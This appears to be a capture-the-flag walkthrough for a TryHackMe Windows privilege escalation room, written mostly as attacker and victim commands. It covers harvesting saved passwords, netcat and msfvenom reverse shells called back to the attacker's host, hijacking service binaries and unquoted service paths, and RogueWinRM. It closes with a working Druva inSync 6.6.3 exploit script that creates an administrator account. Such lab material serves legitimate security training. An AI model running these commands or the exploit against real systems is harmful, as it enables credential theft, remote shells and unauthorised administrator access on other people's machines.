Windows Privilege Escalation

Room Link: https://tryhackme.com/room/windowsprivesc20

Harvesting Passwords from Usual Spots

A password for the julia.jones user has been left on the Powershell history. What is the password?

Victim(cmd)

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?

Victim(cmd)

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.

Victim(cmd)

cmdkey /list
runas /savecred /user:WPRIVESC1\mike.katz cmd.exe

Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?

Victim(cmd)

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Other Quick Wins

What is the taskusr1 flag?

Victim(cmd)

schtasks /query /tn vulntask /fo list /v

Victim(cmd)

icacls c:\tasks\schtask.bat

Victim(cmd)

icacls c:\tasks\schtask.bat

Kali

nc -lvnp 4444

Victim

echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask

Abusing Service Misconfigurations

Insecure Permissions on Service Executable

Get the flag on svcusr1's desktop

Victim(cmd)

sc qc WindowsScheduler

Victim(cmd)

icacls C:\PROGRA~2\SYSTEM~1\WService.exe

Kali

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81

Victim(Powershell)

wget http://$KALI:81/rev-svc.exe -O rev-svc.exe

Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.

Victim(Powershell)

cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

Kali

nc -lvp 4445

Note: PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.

As a result, you'll get a reverse shell with svcusr1 privileges:

Victim(cmd)

sc stop windowsscheduler
sc start windowsscheduler

OR

Victim(Powershell)

sc.exe stop windowsscheduler
sc.exe start windowsscheduler

Unquoted Service Paths

Victim(cmd)

 sc qc "disk sorter enterprise"

Kali

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81

Victim(Powershell)

wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F

Kali

nc -lvp 4446

Victim(cmd)

sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"

Insecure Service Permissions

Victim(cmd)

cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice

Kali

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81

Victim(Powershell)

wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exe

Kali

nc -lvp 4447

Victim(Powershell)

icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService

Abusing dangerous privileges

Kali

nc -lvp 4442

Victim(Browser)

c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"

Abusing vulnerable software

Case Study: Druva inSync 6.6.3

Druva_inSync_exploit.ps1

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

Victim

cd C:\tools\
.\Druva_inSync_exploit.ps1

Victim(Powershell)

runas /user:pwned "C:\Windows\system32\cmd.exe"
Enter the password for pwnd: SimplePass123

Victim(cmd)

powershell.exe -Command "Start-Process cmd "/k cd /d %cd%" -Verb RunAs"